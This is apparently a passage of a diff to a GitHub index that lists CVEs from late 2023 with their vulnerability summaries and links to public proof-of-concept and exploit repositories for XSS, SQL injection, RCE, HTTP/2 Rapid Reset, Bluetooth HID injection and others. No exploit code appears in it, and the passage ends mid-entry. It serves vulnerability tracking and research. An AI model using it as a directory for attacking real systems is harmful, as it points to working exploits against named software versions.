[OligoCyberSecurity/ShellTorchChecker](https://github.com/OligoCyberSecurity/ShellTorchChecker) +- [OligoCyberSecurity/CVE-2023-43654](https://github.com/OligoCyberSecurity/CVE-2023-43654) + +### CVE-2023-43667 (2023-10-16) + +Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.8.0, the attacker can create misleading or false log records, making it harder to audit\nand trace malicious activities. Users are advised to upgrade to Apache InLong's 1.9.0 or cherry-pick [1] to solve it.\n\n[1] https://github.com/apache/inlong/pull/8628 + + +- [miguelc49/CVE-2023-43667-2](https://github.com/miguelc49/CVE-2023-43667-2) +- [miguelc49/CVE-2023-43667-1](https://github.com/miguelc49/CVE-2023-43667-1) +- [miguelc49/CVE-2023-43667-3](https://github.com/miguelc49/CVE-2023-43667-3) + +### CVE-2023-43757 (2023-11-16) + +Inadequate encryption strength vulnerability in multiple routers provided by ELECOM CO.,LTD. and LOGITEC CORPORATION allows a network-adjacent unauthenticated attacker to guess the encryption key used for wireless LAN communication and intercept the communication. As for the affected products/versions, see the information provided by the vendor under [References] section. + + +- [sharmashreejaa/CVE-2023-43757](https://github.com/sharmashreejaa/CVE-2023-43757) + +### CVE-2023-43770 (2023-09-22) + +Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3 allows XSS via text/plain e-mail messages with crafted links because of program/lib/Roundcube/rcube_string_replacer.php behavior. + + +- [s3cb0y/CVE-2023-43770-POC](https://github.com/s3cb0y/CVE-2023-43770-POC) +- [knight0x07/CVE-2023-43770-PoC](https://github.com/knight0x07/CVE-2023-43770-PoC) + +### CVE-2023-43786 (2023-10-10) + +A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition. + + +- [jfrog/jfrog-CVE-2023-43786-libX11_DoS](https://github.com/jfrog/jfrog-CVE-2023-43786-libX11_DoS) + +### CVE-2023-43838 (2023-10-04) + +An arbitrary file upload vulnerability in Personal Management System v1.4.64 allows attackers to execute arbitrary code via uploading a crafted SVG file into a user profile's avatar. + + +- [rootd4ddy/CVE-2023-43838](https://github.com/rootd4ddy/CVE-2023-43838) + +### CVE-2023-43871 (2023-09-28) + +A File upload vulnerability in WBCE v.1.6.1 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS). + + +- [sromanhu/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media](https://github.com/sromanhu/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media) + +### CVE-2023-43872 (2023-09-28) + +A File upload vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS). + + +- [sromanhu/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager](https://github.com/sromanhu/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager) + +### CVE-2023-43873 (2023-09-28) + +A Cross Site Scripting (XSS) vulnerability in e017 CMS v.2.3.2 allows a local attacker to execute arbitrary code via a crafted script to the Name filed in the Manage Menu. + + +- [sromanhu/CVE-2023-43873-e107-CMS-Stored-XSS---Manage](https://github.com/sromanhu/CVE-2023-43873-e107-CMS-Stored-XSS---Manage) + +### CVE-2023-43874 (2023-09-28) + +Multiple Cross Site Scripting (XSS) vulnerability in e017 CMS v.2.3.2 allows a local attacker to execute arbitrary code via a crafted script to the Copyright and Author fields in the Meta & Custom Tags Menu. + + +- [sromanhu/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags](https://github.com/sromanhu/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags) + +### CVE-2023-43875 (2023-10-19) + +Multiple Cross-Site Scripting (XSS) vulnerabilities in installation of Subrion CMS v.4.2.1 allows a local attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost, dbname, dbuser, adminusername and adminemail. + + +- [sromanhu/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation) + +### CVE-2023-43876 (2023-09-28) + +A Cross-Site Scripting (XSS) vulnerability in installation of October v.3.4.16 allows an attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost field. + + +- [sromanhu/CVE-2023-43876-October-CMS-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43876-October-CMS-Reflected-XSS---Installation) + +### CVE-2023-43877 (2023-10-04) + +Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a payload crafted in the Home Page fields in the Administration menu. + + +- [sromanhu/CVE-2023-43877-RiteCMS-Stored-XSS---Home](https://github.com/sromanhu/CVE-2023-43877-RiteCMS-Stored-XSS---Home) + +### CVE-2023-43878 (2023-09-28) + +Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a crafted payload into the Main Menu Items in the Administration Menu. + + +- [sromanhu/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu](https://github.com/sromanhu/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu) + +### CVE-2023-43879 (2023-09-28) + +Rite CMS 3.0 has a Cross-Site scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload into the Global Content Blocks in the Administration Menu. + + +- [sromanhu/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent](https://github.com/sromanhu/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent) + +### CVE-2023-43955 (2023-12-27) + +The com.phlox.tvwebbrowser TV Bro application through 2.0.0 for Android mishandles external intents through WebView. This allows attackers to execute arbitrary code, create arbitrary files. and perform arbitrary downloads via JavaScript that uses takeBlobDownloadData. + + +- [actuator/com.phlox.tvwebbrowser](https://github.com/actuator/com.phlox.tvwebbrowser) + +### CVE-2023-44061 (2023-10-06) + +File Upload vulnerability in Simple and Nice Shopping Cart Script v.1.0 allows a remote attacker to execute arbitrary code via the upload function in the edit profile component. + + +- [soundarkutty/CVE-2023-44061](https://github.com/soundarkutty/CVE-2023-44061) + +### CVE-2023-44451 (2024-05-03) + +Linux Mint Xreader EPUB File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Mint Xreader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of EPUB files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-21897. + + +- [febinrev/slippy-book-exploit](https://github.com/febinrev/slippy-book-exploit) + +### CVE-2023-44452 (2024-05-03) + +Linux Mint Xreader CBT File Parsing Argument Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Mint Xreader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of CBT files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22132. + + +- [febinrev/atril_cbt-inject-exploit](https://github.com/febinrev/atril_cbt-inject-exploit) + +### CVE-2023-44487 (2023-10-10) + +The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. + + +- [bcdannyboy/CVE-2023-44487](https://github.com/bcdannyboy/CVE-2023-44487) +- [imabee101/CVE-2023-44487](https://github.com/imabee101/CVE-2023-44487) +- [ByteHackr/CVE-2023-44487](https://github.com/ByteHackr/CVE-2023-44487) +- [pabloec20/rapidreset](https://github.com/pabloec20/rapidreset) +- [secengjeff/rapidresetclient](https://github.com/secengjeff/rapidresetclient) +- [studiogangster/CVE-2023-44487](https://github.com/studiogangster/CVE-2023-44487) +- [ReToCode/golang-CVE-2023-44487](https://github.com/ReToCode/golang-CVE-2023-44487) +- [ndrscodes/http2-rst-stream-attacker](https://github.com/ndrscodes/http2-rst-stream-attacker) +- [nxenon/cve-2023-44487](https://github.com/nxenon/cve-2023-44487) +- [terrorist/HTTP-2-Rapid-Reset-Client](https://github.com/terrorist/HTTP-2-Rapid-Reset-Client) +- [sigridou/CVE-2023-44487-](https://github.com/sigridou/CVE-2023-44487-) +- [TYuan0816/cve-2023-44487](https://github.com/TYuan0816/cve-2023-44487) +- [sn130hk/CVE-2023-44487](https://github.com/sn130hk/CVE-2023-44487) + +### CVE-2023-44758 (2023-10-06) + +GDidees CMS 3.0 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Title. + + +- [sromanhu/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title](https://github.com/sromanhu/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title) + +### CVE-2023-44760 (2023-10-23) + +Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS v.9.2.1 allow an attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics. NOTE: the vendor disputes this because these header/footer changes can only be made by an admin, and allowing an admin to place JavaScript there is an intentional customization feature. Also, the exploitation method claimed by "sromanhu" does not provide any access to a Concrete CMS session, because the Concrete CMS session cookie is configured as HttpOnly. + + +- [sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes](https://github.com/sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes) + +### CVE-2023-44761 (2023-10-06) + +Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS versions affected to 8.5.13 and below, and 9.0.0 through 9.2.1 allow a local attacker to execute arbitrary code via a crafted script to the Forms of the Data objects. + + +- [sromanhu/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms](https://github.com/sromanhu/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms) + +### CVE-2023-44762 (2023-10-06) + +A Cross Site Scripting (XSS) vulnerability in Concrete CMS from versions 9.2.0 to 9.2.2 allows an attacker to execute arbitrary code via a crafted script to the Tags from Settings - Tags. + + +- [sromanhu/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags](https://github.com/sromanhu/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags) + +### CVE-2023-44763 (2023-10-10) + +Concrete CMS v9.2.1 is affected by an Arbitrary File Upload vulnerability via a Thumbnail file upload, which allows Cross-Site Scripting (XSS). NOTE: the vendor's position is that a customer is supposed to know that "pdf" should be excluded from the allowed file types, even though pdf is one of the allowed file types in the default configuration. + + +- [sromanhu/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail](https://github.com/sromanhu/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail) + +### CVE-2023-44764 (2023-10-06) + +A Cross Site Scripting (XSS) vulnerability in Concrete CMS before 9.2.3 exists via the Name parameter during installation (aka Site of Installation or Settings). + + +- [sromanhu/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation](https://github.com/sromanhu/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation) + +### CVE-2023-44765 (2023-10-06) + +A Cross Site Scripting (XSS) vulnerability in Concrete CMS versions 8.5.12 and below, and 9.0 through 9.2.1 allows an attacker to execute arbitrary code via a crafted script to Plural Handle of the Data Objects from System & Settings. + + +- [sromanhu/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations](https://github.com/sromanhu/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations) + +### CVE-2023-44766 (2023-10-06) + +A Cross Site Scripting (XSS) vulnerability in Concrete CMS v.9.2.1 allows an attacker to execute arbitrary code via a crafted script to the SEO - Extra from Page Settings. NOTE: the vendor disputes this because this SEO-related header change can only be made by an admin, and allowing an admin to place JavaScript there is an intentional customization feature. + + +- [sromanhu/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO](https://github.com/sromanhu/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO) + +### CVE-2023-44767 (2023-10-24) + +A File upload vulnerability in RiteCMS 3.0 allows a local attacker to upload a SVG file with XSS content. + + +- [sromanhu/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager](https://github.com/sromanhu/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager) + +### CVE-2023-44769 (2023-10-24) + +A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows a local attacker to execute arbitrary code via a crafted script to the Spare aliases from Alias. + + +- [sromanhu/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias](https://github.com/sromanhu/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias) + +### CVE-2023-44770 (2023-10-06) + +A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows an attacker to execute arbitrary code via a crafted script to the Organizer - Spare alias. + + +- [sromanhu/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias](https://github.com/sromanhu/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias) + +### CVE-2023-44771 (2023-10-06) + +A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows a local attacker to execute arbitrary code via a crafted script to the Page Layout. + + +- [sromanhu/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout](https://github.com/sromanhu/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout) + +### CVE-2023-44811 (2023-10-09) + +Cross Site Request Forgery (CSRF) vulnerability in MooSocial v.3.1.8 allows a remote attacker to execute arbitrary code and obtain sensitive information via the admin Password Change Function. + + +- [ahrixia/CVE-2023-44811](https://github.com/ahrixia/CVE-2023-44811) + +### CVE-2023-44812 (2023-10-09) + +Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the admin_redirect_url parameter of the user login function. + + +- [ahrixia/CVE-2023-44812](https://github.com/ahrixia/CVE-2023-44812) + +### CVE-2023-44813 (2023-10-09) + +Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function. + + +- [ahrixia/CVE-2023-44813](https://github.com/ahrixia/CVE-2023-44813) + +### CVE-2023-44961 (2023-10-11) + +SQL Injection vulnerability in Koha Library Software 23.0.5.04 and before allows a remote attacker to obtain sensitive information via the intranet/cgi bin/cataloging/ysearch.pl. component. + + +- [ggb0n/CVE-2023-44961](https://github.com/ggb0n/CVE-2023-44961) + +### CVE-2023-44962 (2023-10-11) + +File Upload vulnerability in Koha Library Software 23.05.04 and before allows a remote attacker to read arbitrary files via the upload-cover-image.pl component. + + +- [ggb0n/CVE-2023-44962](https://github.com/ggb0n/CVE-2023-44962) + +### CVE-2023-44976 +- [keowu/BadRentdrv2](https://github.com/keowu/BadRentdrv2) + +### CVE-2023-45158 (2023-10-16) + +An OS command injection vulnerability exists in web2py 2.24.1 and earlier. When the product is configured to use notifySendHandler for logging (not the default configuration), a crafted web request may execute an arbitrary OS command on the web server using the product. + + +- [Evan-Zhangyf/CVE-2023-45158](https://github.com/Evan-Zhangyf/CVE-2023-45158) + +### CVE-2023-45182 (2023-12-14) + +\nIBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 is vulnerable to having its key for an encrypted password decoded. By somehow gaining access to the encrypted password, a local attacker could exploit this vulnerability to obtain the password to other systems. IBM X-Force ID: 268265.\n\n + + +- [afine-com/CVE-2023-45182](https://github.com/afine-com/CVE-2023-45182) + +### CVE-2023-45184 (2023-12-14) + +IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to obtain a decryption key due to improper authority checks. IBM X-Force ID: 268270. + + +- [afine-com/CVE-2023-45184](https://github.com/afine-com/CVE-2023-45184) + +### CVE-2023-45185 (2023-12-14) + +IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to execute remote code. Due to improper authority checks the attacker could perform operations on the PC under the user's authority. IBM X-Force ID: 268273. + + +- [afine-com/CVE-2023-45185](https://github.com/afine-com/CVE-2023-45185) + +### CVE-2023-45239 (2023-10-06) + +A lack of input validation exists in tac_plus prior to commit 4fdf178 which, when pre or post auth commands are enabled, allows an attacker who can control the username, rem-addr, or NAC address sent to tac_plus to inject shell commands and gain remote code execution on the tac_plus server. + + +- [takeshixx/tac_plus-pre-auth-rce](https://github.com/takeshixx/tac_plus-pre-auth-rce) + +### CVE-2023-45280 (2023-10-19) + +Yamcs 5.8.6 allows XSS (issue 2 of 2). It comes with a Bucket as its primary storage mechanism. Buckets allow for the upload of any file. There's a way to upload an HTML file containing arbitrary JavaScript and then navigate to it. Once the user opens the file, the browser will execute the arbitrary JavaScript. + + +- [miguelc49/CVE-2023-45280-1](https://github.com/miguelc49/CVE-2023-45280-1) +- [miguelc49/CVE-2023-45280-3](https://github.com/miguelc49/CVE-2023-45280-3) +- [miguelc49/CVE-2023-45280-2](https://github.com/miguelc49/CVE-2023-45280-2) + +### CVE-2023-45288 (2024-04-04) + +An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection. + + +- [hex0punk/cont-flood-poc](https://github.com/hex0punk/cont-flood-poc) + +### CVE-2023-45471 (2023-10-20) + +The QAD Search Server is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to, and including, 1.0.0.315 due to insufficient checks on indexes. This makes it possible for unauthenticated attackers to create a new index and inject a malicious web script into its name, that will execute whenever a user accesses the search page. + + +- [mehdibelhajamor/CVE-2023-45471](https://github.com/mehdibelhajamor/CVE-2023-45471) + +### CVE-2023-45503 (2024-04-15) + +SQL Injection vulnerability in Macrob7 Macs CMS 1.1.4f, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via crafted payload to resetPassword, forgotPasswordProcess, saveUser, saveRole, deleteUser, deleteRole, deleteComment, deleteUser, allowComment, saveRole, forgotPasswordProcess, resetPassword, saveUser, addComment, saveRole, and saveUser endpoints. + + +- [ally-petitt/CVE-2023-45503](https://github.com/ally-petitt/CVE-2023-45503) + +### CVE-2023-45540 (2023-10-16) + +An issue in Jorani Leave Management System 1.0.3 allows a remote attacker to execute arbitrary HTML code via a crafted script to the comment field of the List of Leave requests page. + + +- [soundarkutty/CVE-2023-45540](https://github.com/soundarkutty/CVE-2023-45540) + +### CVE-2023-45542 (2023-10-16) + +Cross Site Scripting vulnerability in mooSocial 3.1.8 allows a remote attacker to obtain sensitive information via a crafted script to the q parameter in the Search function. + + +- [ahrixia/CVE-2023-45542](https://github.com/ahrixia/CVE-2023-45542) + +### CVE-2023-45657 (2023-11-06) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in POSIMYTH Nexter allows SQL Injection.This issue affects Nexter: from n/a through 2.0.3.\n\n + + +- [RandomRobbieBF/CVE-2023-45657](https://github.com/RandomRobbieBF/CVE-2023-45657) + +### CVE-2023-45777 (2023-12-04) + +In checkKeyIntentParceledCorrectly of AccountManagerService.java, there is a possible way to launch arbitrary activities using system privileges due to Parcel Mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [michalbednarski/TheLastBundleMismatch](https://github.com/michalbednarski/TheLastBundleMismatch) + +### CVE-2023-45779 (2023-12-04) + +In the APEX module framework of AOSP, there is a possible malicious update to platform components due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. More details on this can be found in the referenced links.\n + + +- [metaredteam/rtx-cve-2023-45779](https://github.com/metaredteam/rtx-cve-2023-45779) + +### CVE-2023-45827 (2023-11-06) + +Dot diver is a lightweight, powerful, and dependency-free TypeScript utility library that provides types and functions to work with object paths in dot notation. In versions prior to 1.0.2 there is a Prototype Pollution vulnerability in the `setByPath` function which can leads to remote code execution (RCE). This issue has been addressed in commit `98daf567` which has been included in release 1.0.2. Users are advised to upgrade. There are no known workarounds to this vulnerability.\n + + +- [200101WhoAmI/CVE-2023-45827](https://github.com/200101WhoAmI/CVE-2023-45827) + +### CVE-2023-45828 +- [RandomRobbieBF/CVE-2023-45828](https://github.com/RandomRobbieBF/CVE-2023-45828) + +### CVE-2023-45857 (2023-11-08) + +An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information. + + +- [valentin-panov/CVE-2023-45857](https://github.com/valentin-panov/CVE-2023-45857) +- [intercept6/CVE-2023-45857-Demo](https://github.com/intercept6/CVE-2023-45857-Demo) +- [fuyuooumi1027/CVE-2023-45857-Demo](https://github.com/fuyuooumi1027/CVE-2023-45857-Demo) + +### CVE-2023-45866 (2023-12-08) + +Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue. + + +- [pentestfunctions/BlueDucky](https://github.com/pentestfunctions/BlueDucky) +- [Eason-zz/BluetoothDucky](https://github.com/Eason-zz/BluetoothDucky) +- [jjjjjjjj987/cve-2023-45866-py](https://github.com/jjjjjjjj987/cve-2023-45866-py) +- [cisnarfu/Bluepop](https://github.com/cisnarfu/Bluepop) +- [AvishekDhakal/CVE-2023-45866_EXPLOITS](https://github.com/AvishekDhakal/CVE-2023-45866_EXPLOITS) +- [Chedrian07/CVE-2023-45866-POC](https://github.com/Chedrian07/CVE-2023-45866-POC) + +### CVE-2023-45966 (2023-10-23) + +umputun remark42 version 1.12.1 and before has a Blind Server-Side Request Forgery (SSRF) vulnerability. + + +- [jet-pentest/CVE-2023-45966](https://github.com/jet-pentest/CVE-2023-45966) + +### CVE-2023-45992 (2023-10-19) + +A vulnerability in the web-based interface of the RUCKUS Cloudpath product on version 5.12 build 5538 or before to could allow a remote, unauthenticated attacker to execute persistent XSS and CSRF attacks against a user of the admin management interface. A successful attack, combined with a certain admin activity, could allow the attacker to gain full admin privileges on the exploited system. + + +- [harry935/CVE-2023-45992](https://github.com/harry935/CVE-2023-45992) + +### CVE-2023-46003 (2023-10-21) + +I-doit pro 25 and below is vulnerable to Cross Site Scripting (XSS) via index.php. + + +- [leekenghwa/CVE-2023-46003](https://github.com/leekenghwa/CVE-2023-46003) + +### CVE-2023-46012 (2024-05-07) + +Buffer Overflow vulnerability LINKSYS EA7500 3.0.1.207964 allows a remote attacker to execute arbitrary code via an HTTP request to the IGD UPnP. + + +- [dest-3/CVE-2023-46012](https://github.com/dest-3/CVE-2023-46012) + +### CVE-2023-46014 (2023-11-13) + +SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters. + + +- [ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) + +### CVE-2023-46015 (2023-11-13) + +Cross Site Scripting (XSS) vulnerability in index.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via 'msg' parameter in application URL. + + +- [ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability) + +### CVE-2023-46016 (2023-11-13) + +Cross Site Scripting (XSS) in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'search' parameter in the application URL. + + +- [ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability) + +### CVE-2023-46017 (2023-11-13) + +SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' and 'rpassword' parameters. + + +- [ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) + +### CVE-2023-46018 (2023-11-13) + +SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter. + + +- [ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) + +### CVE-2023-46019 (2023-11-13) + +Cross Site Scripting (XSS) vulnerability in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'error' parameter. + + +- [ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability) + +### CVE-2023-46020 (2023-11-13) + +Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters. + + +- [ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability) + +### CVE-2023-46021 (2023-11-13) + +SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter. + + +- [ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability) + +### CVE-2023-46022 (2023-11-14) + +SQL Injection vulnerability in delete.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via the 'bid' parameter. + + +- [ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability) + +### CVE-2023-46197 (2024-05-17) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in supsystic.Com Popup by Supsystic allows Relative Path Traversal.This issue affects Popup by Supsystic: from n/a through 1.10.19. + + +- [RandomRobbieBF/CVE-2023-46197](https://github.com/RandomRobbieBF/CVE-2023-46197) + +### CVE-2023-46303 (2023-10-22) + +link_to_local_path in ebooks/conversion/plugins/html_input.py in calibre before 6.19.0 can, by default, add resources outside of the document root. + + +- [0x1717/ssrf-via-img](https://github.com/0x1717/ssrf-via-img) + +### CVE-2023-46304 (2024-04-30) + +modules/Users/models/Module.php in Vtiger CRM 7.5.0 allows a remote authenticated attacker to run arbitrary PHP code because an unprotected endpoint allows them to write this code to the config.inc.php file (executed on every page load). + + +- [jselliott/CVE-2023-46304](https://github.com/jselliott/CVE-2023-46304) + +### CVE-2023-46344 (2024-02-02) + +A vulnerability in Solar-Log Base 15 Firmware 6.0.1 Build 161, and possibly other Solar-Log Base products, allows an attacker to escalate their privileges by exploiting a stored cross-site scripting (XSS) vulnerability in the switch group function under /#ilang=DE&b=c_smartenergy_swgroups in the web portal. The vulnerability can be exploited to gain the rights of an installer or PM, which can then be used to gain administrative access to the web portal and execute further attacks. NOTE: The vendor states that this vulnerability has been fixed with 3.0.0-60 11.10.2013 for SL 200, 500, 1000 / not existing for SL 250, 300, 1200, 2000, SL 50 Gateway, SL Base. + + +- [vinnie1717/CVE-2023-46344](https://github.com/vinnie1717/CVE-2023-46344) + +### CVE-2023-46371 (2023-10-24) + +TP-Link device TL-WDR7660 2.0.30 and TL-WR886N 2.0.12 has a stack overflow vulnerability via the function upgradeInfoJsonToBin. + + +- [Jianchun-Ding/CVE-poc-update](https://github.com/Jianchun-Ding/CVE-poc-update) + +### CVE-2023-46404 (2023-11-03) + +PCRS <= 3.11 (d0de1e) “Questions” page and “Code editor” page are vulnerable to remote code execution (RCE) by escaping Python sandboxing. + + +- [windecks/CVE-2023-46404](https://github.com/windecks/CVE-2023-46404) + +### CVE-2023-46442 (-) + +An infinite loop in the retrieveActiveBody function of Soot before v4.4.1 under Java 8 allows attackers to cause a Denial of Service (DoS). + + +- [JAckLosingHeart/CVE-2023-46442_POC](https://github.com/JAckLosingHeart/CVE-2023-46442_POC) + +### CVE-2023-46447 (2024-01-20) + +The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE. + + +- [actuator/rebel](https://github.com/actuator/rebel) + +### CVE-2023-46449 (2023-10-26) + +Sourcecodester Free and Open Source inventory management system v1.0 is vulnerable to Incorrect Access Control. An arbitrary user can change the password of another user and takeover the account via IDOR in the password change function. + + +- 